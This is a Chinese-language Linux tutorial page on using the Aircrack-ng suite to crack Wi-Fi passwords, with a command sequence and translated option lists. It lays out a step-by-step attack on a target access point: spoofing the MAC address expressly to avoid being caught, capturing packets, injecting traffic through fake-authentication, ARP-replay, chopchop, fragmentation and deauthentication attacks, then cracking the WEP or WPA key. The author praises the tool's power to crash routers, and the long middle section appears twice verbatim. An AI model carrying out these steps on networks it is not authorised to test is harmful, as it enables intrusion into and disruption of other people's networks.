Welcome 微信登录

首页 / 操作系统 / Linux / Aircrack-ng使用教程

Aircrack-ng系列工具也有Windows 平台版本,但是本人的小黑的始终不能在win下抓包,所以只能 弃 Windows  从Linux 了,另外 Windows  下扫描到的 AP 也比 Linux 下少了很多。其实 Windows  并不完整的支持 TCP/IP 协议族,有些协议Windows  直接丢弃不用。网络本来从一开始就是 Unix 的天下,Windows  只是在后来加入了网络的功能。 Aircrack-ng工具包有很多工具,我用到的工具主要有以下几个:
airmon-ng 处理网卡工作模式
airodump-ng 抓包
aircrack-ng 破解
aireplay-ng 发包,干扰
另外还要用到以下 linux 命令:
ifconfig 查看修改网卡状态和参数
macchanger 伪造 MAC
iwconfig 主要针对无线网卡的工具 (同 ifconfig)
iwlist 获取无线网络的更详细信息
另外还有其他的 linux 基本命令,我就不提示了。
具体破解步骤:
1. 修改无线网卡状态:先 dow
2. 伪造无线网卡的 MAC 地址:安全起见,减少被抓到的可能
3. 修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡
4. 修改无线网卡状态: up
5. 查看网络状态,记录下 AP 的 MAC 和本机的 MAC ,确定攻击目标
6. 监听抓包:生成 .cap 或 .ivs
7. 干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包
8. 破解 .cap 或 .ivs ,获得 WEP 密码,完成破解
Crack Mode一共有5种请酌情使用还有网卡不一定是ath1也有可能是wifi0,ath0等等
ifconfig -a
ifconfig -a ath0 up
airmon-ng start wifi0 6
airodump-ng --ivs -w 目标路由器IVS文件 -c 6 ath1
airodump-ng ath1
aireplay-ng -1 0 -e 目标路由器SSID -a 目标MAC -h 本机MAC ath1
----------- -2 Crack Mode-----------
aireplay-ng -2 -p 0841 -c ffffffffffff -b 目标MAC -h 本机MAC ath1
----------- -3 Crack Mode-----------
aireplay-ng -3 -b 目标MAC -h 本机MAC ath1
----------- -4 Crack Mode-----------
aireplay-ng -4 -b 目标MAC -h 本机MAC ath1
packetforge-ng -0 -a 目标MAC -h 本机MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp
aireplay-ng -2 -r MyArp -x 256 ath1
----------- -5 Crack Mode-----------
aireplay-ng -5 -b 目标MAC -h 本机MAC ath1
packetforge-ng -0 -a 目标MAC -h 本机MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp
aireplay-ng -2 -r MyArp -x 256 ath1
-----------Crack Key-----------
aircrack-ng -n 64 -b 目标MAC 目标路由器IVS文件-01.ivs—————————————————————————————— 下面详细介绍一下各个命令的基本用法(参照命令的英文说明) 1. ifconfig 用来配置网卡,我们这里主要用来 禁用和启用 网卡: ifconfig ath0 down ifconfig ath0 up 禁用一下网卡的目的是为了下一步修改 MAC 。 2.macchanger 用来改变网卡的 MAC 地址,具体用法如下: usage: macchanger [options] device -h 显示帮助 -V 显示版本 -s 显示当前MAC -e 不改变mac,使用硬件厂商写入的MAC -a 自动生成一个同类型的MAC,同厂商的 -A 自动生成一个不同类型的MAC,不同厂商的 -r 生成任意MAC -l 显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出来是哪个厂商生产的产品 -m 设置一个自定义的MAC 如: macchanger --mac=00:34:00:00:00:00 ath0 。 3.airmon-ng 启动无线网卡进入 Monitor 模式, useage: airmon-ng <start|stop|check> <interface> [channel] <start|stop|check>启动,停止,检测 <interface>指定无线网卡 [channel] 监听频道,现代大多数无线路由默认是 6,随便扫描一下都是这个频道,网管们应该换换了 4.iwconfig 专用的无线网卡配置工具,用来配置特殊的网络信息,不带参数时显示可用网络。 useage:iwconfig interface [options] [essid{NN|ON|OFF}] 指定essid号 开启关闭 [nwid{NN|on|off}] 指定网络id号 开启关闭 [mode {managed|ad-hoc|....}] 指定无线网络工作模式/类型 [freq N.NNNN[K|M|G]] 指定工作频率 [channel N] 指定频道 [ap {N|off|auto}] 指定AP号 关闭/自动 [sens N] sens 号 [nick N] nick 号 [rate {N|auto|fixed}] 速率控制 [rts {N|auto|fixed|off}] rts控制,如果不知道什么是RTS,那就回去好好去学网络,不用往下看了 [frag {N|auto|fixed|off}] 碎片控制 [enc {NNNN-NNNN|off}] 范围 [power {period N|timeout N}] 电源 频率/超时 [retry {limit N|lifetime N}] 重试 限次/超时 [txpower N{mw|dBm}] 功率 毫瓦/分贝 [commit] 处理 5.iwlist 主要用来显示无线网卡的一些附加信息,同上 useage: iwlist [interface] options scanning 扫描 frequency 频率 channel 频道 bitrate 速率 rate 速率 encryption 加密 key 密钥 power 电源 txpower 功率 ap ap accespoints ap peers 直连 event 事件 6.airodump-ng 抓包工具,我最喜欢用的,详细用法如下: usage: airodump-ng <options> <interface>[,<interface>,...] Options: --ivs :仅将抓取信息保存为 .ivs --gpsd :使用 GPSd --write <prefix> :保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分 -w :同 --write --beacons :保存所有的 beacons ,默认情况况下是丢弃那些无用的数据包的 --update <secs> :显示更新延迟,没有用过 --showack :显示ack/cts/rts状态,还是那句,不知道rts就不用看了 -h :隐藏已知的,配合上面的选项使用 -f <msecs> :跳频时间 --berlin <secs> :无数据包接收时延迟显示的时间,这句不太好翻译,意思是当那个信号发出设备没有发出数据包多少时间之后,就停止对它的监视.默认120秒.建议学好英文去读原文,翻译的都会有出入,这是我的理解.(mhy_mhy注) -r <file> :从指定的文件读取数据包.我也想有人给我抓好包放哪里,呵呵 Filter options: --encrypt <suite> : 使用密码序列过滤 AP --netmask <netmask> : 使用掩码过滤 AP --bssid <bssid> : 使用 bssid 过滤 AP -a : 过滤无关的客户端 默认情况下使用2.4Ghz,你也可以指定其他的频率,通过以下命令操作: --channel <channels>:指定频道 --band <abg> :制定带宽 -C <frequencies> :指定频率MHz --cswitch <method> : 设置频道交换方式 0 : FIFO (default) 先进先出(默认) 1 : Round Robin 循环 2 : Hop on last 最后一跳 -s : 同上 --help : 显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文 7.aireplay-ng 搞破坏的工具,注意杀伤力很大,甚至可以损坏劣质的 AP 设备(小内存的路由器可能会重启,或者彻底被破坏掉),我很喜欢这个东西,相信你也会喜欢的,使用时注意分寸. usage: aireplay-ng <options> <replay interface> Filter options: -b bssid : AP的 MAC -d dmac : 目标的 MAC -s smac : 来源的 MAC -m len : 最小包长度 -n len : 最大包长度 -u type : 帧控制, type field -v subt : 帧控制, subtype field -t tods : 帧控制, To DS bit -f fromds : 帧控制, From DS bit -w iswep : 帧控制, WEP bit -D : 禁用 AP 发现功能 Replay options: -x nbpps : 每秒包数量 -p fctrl : 框架设定 (hex) -a bssid : 设置AP的 mac -c dmac : 设置目标的 MAC -h smac : 设置来源的 mac -g value : 改变环缓存大小 (默认8) -F : 选择第一个匹配的包 Fakeauth attack options: -e essid : 设置目标 AP 的 SSID -o npckts : 每秒爆破的包数量 (0 自动, 默认 1) -q sec : 存活时间 秒 -y prga : 共享可信的 key流 ARP欺骗原理 Replay attack options: -j : 注入 fromDS 数据包,还没有用过这个选项 Fragmentation attack options: -k IP : 设置目的IP 碎片 -l IP : 设置源IP碎片 Test attack options: -B : 激活 bitrate 测试 source options: -i iface : 设置抓包的接口设备 -r file : 从pcap文件析取数据包 attack modes (Numbers can still be used): 攻击模式,最具杀伤力的地方 --deauth count : 不信任一切 (-0) --fakeauth delay : 欺骗AP的信任 (-1) --interactive : 交互的选择 (-2) --arpreplay : 标准的 ARP欺骗原理-request replay (-3) --chopchop : 解密 WEP 包 (-4) --fragment : 生成有效的 key流 (-5) --caffe-latte : 从客户端获取新的 IVs (-6) --cfrag : 对客户端进行碎片攻击 (-7) --test : 测试注射及效果 (-9) --help : 显示这个帮助,这部分是全部依照我的使用来翻译,没有完全准确的翻译,主要对付那些不给出作者就引用的人,鄙视抄袭. 8.aircrack-ng 破解KEY,漫长的过程.漫不漫长取决于两个方面: 一是网管的聪明程度(能否设置出复杂的密码),二是电脑的速度. usage: aircrack-ng [options] <.cap / .ivs file(s)> Common options: -a <amode> : 暴破 (1/WEP, 2/WPA-PSK) -e <essid> : 选择 essid 为目标 -b <bssid> : 选择 ap的 mac 为目标,就是破解识别的关键字 -q : 使用安静模式,无数出模式 -C <macs> : 将所有的 AP 合并为一个虚拟的 Static WEP cracking options: -c : 仅搜索字母数字 -t : 仅搜索二进制 -h : 搜索数字关键?? (用于坏掉的部分),翻译不出来了 -d <mask> : 指定掩码(A1:XX:CF:YY) -m <maddr> : 用 MAC 匹配可用的数据包 -n <nbits> : WEP 长度 64/128/152/256/512 -i <index> : WEP 索引(1 to 4), default: any -f <fudge> : 暴破强度默认2,原文字面意思是"禽兽强迫 捏造 事实",呵呵 -k <korek> : 禁用一种破解方式 (1 to 17) -x or -x0 : 禁用最新关键字暴破 -x1 : 使用最新关键字暴破 默认 -x2 : 用最新两个字节暴破 -y : 实验单线程模式 -K : KoreK 攻击 (pre-PTW) -s : 显示为 ASCII -M <num> : 最大数量 ivs 使用 -D : WEP 非隐蔽模式 -P <num> : PTW debug: 1 disable Klein, 2 PTW -1 : 尝试一次 PTW WEP and WPA-PSK cracking options: -w <words> : 指定目录文件,可以多个 -r <DB> : 制定 airolib-ng 数据库,不能和 -w 一起使用 --help : 显示这个帮助 下面以我的硬件实例来操作一下: 我的硬件是 atheros 的 a/b/g 无线网卡,在 linux 中显示为 ath0 ,我只列出我常用的命令步骤,不再做任何解释: ifconfig ath0 down macchanger -r ath0 macchanger -r wifi0 ifconfig ath1 up airmon-ng start ath1 6 iwconfig ath1 iwlist ath1 scanning airodump-ng -w *.cap -c 6 ath1 aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1 aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1 aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 ath1 aireplay-ng -0 1 -a 00:00:00:00:00:00 -c BB:BB:BB:BB:BB:BB ath1 aireplay-ng -3 -b <AP MAC> -h <my MAC> -i ath1 aircrack-ng -x -f 2 *.cap aircrack-ng -w passdict.txt *.cap aircrack-ng -n 64 -b apmac *.ivs  下面详细介绍一下各个命令的基本用法(参照命令的英文说明) 1. ifconfig 用来配置网卡,我们这里主要用来 禁用和启用 网卡: ifconfig ath0 down ifconfig ath0 up 禁用一下网卡的目的是为了下一步修改 MAC 。 2.macchanger 用来改变网卡的 MAC 地址,具体用法如下: usage: macchanger [options] device -h 显示帮助 -V 显示版本 -s 显示当前MAC -e 不改变mac,使用硬件厂商写入的MAC -a 自动生成一个同类型的MAC,同厂商的 -A 自动生成一个不同类型的MAC,不同厂商的 -r 生成任意MAC -l 显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出来是哪个厂商生产的产品 -m 设置一个自定义的MAC 如: macchanger --mac=00:34:00:00:00:00 ath0 。 3.airmon-ng 启动无线网卡进入 Monitor 模式, useage: airmon-ng <start|stop|check> <interface> [channel] <start|stop|check>启动,停止,检测 <interface>指定无线网卡 [channel] 监听频道,现代大多数无线路由默认是 6,随便扫描一下都是这个频道,网管们应该换换了 4.iwconfig 专用的无线网卡配置工具,用来配置特殊的网络信息,不带参数时显示可用网络。 useage:iwconfig interface [options] [essid{NN|ON|OFF}] 指定essid号 开启关闭 [nwid{NN|on|off}] 指定网络id号 开启关闭 [mode {managed|ad-hoc|....}] 指定无线网络工作模式/类型 [freq N.NNNN[K|M|G]] 指定工作频率 [channel N] 指定频道 [ap {N|off|auto}] 指定AP号 关闭/自动 [sens N] sens 号 [nick N] nick 号 [rate {N|auto|fixed}] 速率控制 [rts {N|auto|fixed|off}] rts控制,如果不知道什么是RTS,那就回去好好去学网络,不用往下看了 [frag {N|auto|fixed|off}] 碎片控制 [enc {NNNN-NNNN|off}] 范围 [power {period N|timeout N}] 电源 频率/超时 [retry {limit N|lifetime N}] 重试 限次/超时 [txpower N{mw|dBm}] 功率 毫瓦/分贝 [commit] 处理 5.iwlist 主要用来显示无线网卡的一些附加信息,同上 useage: iwlist [interface] options scanning 扫描 frequency 频率 channel 频道 bitrate 速率 rate 速率 encryption 加密 key 密钥 power 电源 txpower 功率 ap ap accespoints ap peers 直连 event 事件 6.airodump-ng 抓包工具,我最喜欢用的,详细用法如下: usage: airodump-ng <options> <interface>[,<interface>,...] Options: --ivs :仅将抓取信息保存为 .ivs --gpsd :使用 GPSd --write <prefix> :保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分 -w :同 --write --beacons :保存所有的 beacons ,默认情况况下是丢弃那些无用的数据包的 --update <secs> :显示更新延迟,没有用过 --showack :显示ack/cts/rts状态,还是那句,不知道rts就不用看了 -h :隐藏已知的,配合上面的选项使用 -f <msecs> :跳频时间 --berlin <secs> :无数据包接收时延迟显示的时间,这句不太好翻译,意思是当那个信号发出设备没有发出数据包多少时间之后,就停止对它的监视.默认120秒.建议学好英文去读原文,翻译的都会有出入,这是我的理解.(mhy_mhy注) -r <file> :从指定的文件读取数据包.我也想有人给我抓好包放哪里,呵呵 Filter options: --encrypt <suite> : 使用密码序列过滤 AP --netmask <netmask> : 使用掩码过滤 AP --bssid <bssid> : 使用 bssid 过滤 AP -a : 过滤无关的客户端 默认情况下使用2.4Ghz,你也可以指定其他的频率,通过以下命令操作: --channel <channels>:指定频道 --band <abg> :制定带宽 -C <frequencies> :指定频率MHz --cswitch <method> : 设置频道交换方式 0 : FIFO (default) 先进先出(默认) 1 : Round Robin 循环 2 : Hop on last 最后一跳 -s : 同上 --help : 显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文 7.aireplay-ng 搞破坏的工具,注意杀伤力很大,甚至可以损坏劣质的 AP 设备(小内存的路由器可能会重启,或者彻底被破坏掉),我很喜欢这个东西,相信你也会喜欢的,使用时注意分寸. usage: aireplay-ng <options> <replay interface> Filter options: -b bssid : AP的 MAC -d dmac : 目标的 MAC -s smac : 来源的 MAC -m len : 最小包长度 -n len : 最大包长度 -u type : 帧控制, type field -v subt : 帧控制, subtype field -t tods : 帧控制, To DS bit -f fromds : 帧控制, From DS bit -w iswep : 帧控制, WEP bit -D : 禁用 AP 发现功能 Replay options: -x nbpps : 每秒包数量 -p fctrl : 框架设定 (hex) -a bssid : 设置AP的 mac -c dmac : 设置目标的 MAC -h smac : 设置来源的 mac -g value : 改变环缓存大小 (默认8) -F : 选择第一个匹配的包 Fakeauth attack options: -e essid : 设置目标 AP 的 SSID -o npckts : 每秒爆破的包数量 (0 自动, 默认 1) -q sec : 存活时间 秒 -y prga : 共享可信的 key流 ARP欺骗原理 Replay attack options: -j : 注入 fromDS 数据包,还没有用过这个选项 Fragmentation attack options: -k IP : 设置目的IP 碎片 -l IP : 设置源IP碎片 Test attack options: -B : 激活 bitrate 测试 source options: -i iface : 设置抓包的接口设备 -r file : 从pcap文件析取数据包 attack modes (Numbers can still be used): 攻击模式,最具杀伤力的地方 --deauth count : 不信任一切 (-0) --fakeauth delay : 欺骗AP的信任 (-1) --interactive : 交互的选择 (-2) --arpreplay : 标准的 ARP欺骗原理-request replay (-3) --chopchop : 解密 WEP 包 (-4) --fragment : 生成有效的 key流 (-5) --caffe-latte : 从客户端获取新的 IVs (-6) --cfrag : 对客户端进行碎片攻击 (-7) --test : 测试注射及效果 (-9) --help : 显示这个帮助,这部分是全部依照我的使用来翻译,没有完全准确的翻译,主要对付那些不给出作者就引用的人,鄙视抄袭. 8.aircrack-ng 破解KEY,漫长的过程.漫不漫长取决于两个方面: 一是网管的聪明程度(能否设置出复杂的密码),二是电脑的速度. usage: aircrack-ng [options] <.cap / .ivs file(s)> Common options: -a <amode> : 暴破 (1/WEP, 2/WPA-PSK) -e <essid> : 选择 essid 为目标 -b <bssid> : 选择 ap的 mac 为目标,就是破解识别的关键字 -q : 使用安静模式,无数出模式 -C <macs> : 将所有的 AP 合并为一个虚拟的 Static WEP cracking options: -c : 仅搜索字母数字 -t : 仅搜索二进制 -h : 搜索数字关键字 (用于坏掉的部分),翻译不出来了 -d <mask> : 指定掩码(A1:XX:CF:YY) -m <maddr> : 用 MAC 匹配可用的数据包 -n <nbits> : WEP 长度 64/128/152/256/512 -i <index> : WEP 索引(1 to 4), default: any -f <fudge> : 暴破强度默认2,原文字面意思是"禽兽强迫 捏造 事实",呵呵 -k <korek> : 禁用一种破解方式 (1 to 17) -x or -x0 : 禁用最新关键字暴破 -x1 : 使用最新关键字暴破 默认 -x2 : 用最新两个字节暴破 -y : 实验单线程模式 -K : KoreK 攻击 (pre-PTW) -s : 显示为 ASCII -M <num> : 最大数量 ivs 使用 -D : WEP 非隐蔽模式 -P <num> : PTW debug: 1 disable Klein, 2 PTW -1 : 尝试一次 PTW WEP and WPA-PSK cracking options: -w <words> : 指定目录文件,可以多个 -r <DB> : 制定 airolib-ng 数据库,不能和 -w 一起使用 --help : 显示这个帮助 下面以我的硬件实例来操作一下: 我的硬件是 atheros 的 a/b/g 无线网卡,在 linux 中显示为 ath0 ,我只列出我常用的命令步骤,不再做任何解释: ifconfig ath0 down macchanger -r ath0 macchanger -r wifi0 ifconfig ath1 up airmon-ng start ath1 6 iwconfig ath1 iwlist ath1 scanning airodump-ng -w *.cap -c 6 ath1 aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1 aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1 aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 ath1 aireplay-ng -0 1 -a 00:00:00:00:00:00 -c BB:BB:BB:BB:BB:BB ath1 aireplay-ng -3 -b <AP MAC> -h <my MAC> -i ath1 aircrack-ng -x -f 2 *.cap aircrack-ng -w passdict.txt *.cap aircrack-ng -n 64 -b apmac *.ivsAircrack-ng 的详细介绍:请点这里
Aircrack-ng 的下载地址:请点这里相关阅读:Ubuntu 12.04安装最新 Reaver和 aircrack-ng 无线网络破解工具 http://www.linuxidc.com/Linux/2012-06/62045.htmUbuntu Linux无线密码破解利器Aircrack-ng http://www.linuxidc.com/Linux/2010-08/28007.htmUbuntu 及衍生版本用户安装 Double Commander 0.5.9 BetaAircrack-ng的6中攻击模式详解相关资讯      aircrack-ng  Aircrack-ng使用  Aircrack-ng教程 
  • Aircrack-ng破解总结  (04/02/2014 08:45:27)
  • Aircrack-ng 1.2 Beta 3 发布,无  (04/02/2014 08:40:16)
  • Aircrack-ng 1.2 Beta2 发布,无线  (12/02/2013 08:18:20)
  • Aircrack-ng的6中攻击模式详解  (04/02/2014 08:44:31)
  • 无线密码破解工具 Aircrack-ng  (04/02/2014 08:33:03)
  • Aircrack-ng 1.2 Beta1 发布,无线  (05/27/2013 08:31:56)
本文评论 查看全部评论 (0)
表情: 姓名: 字数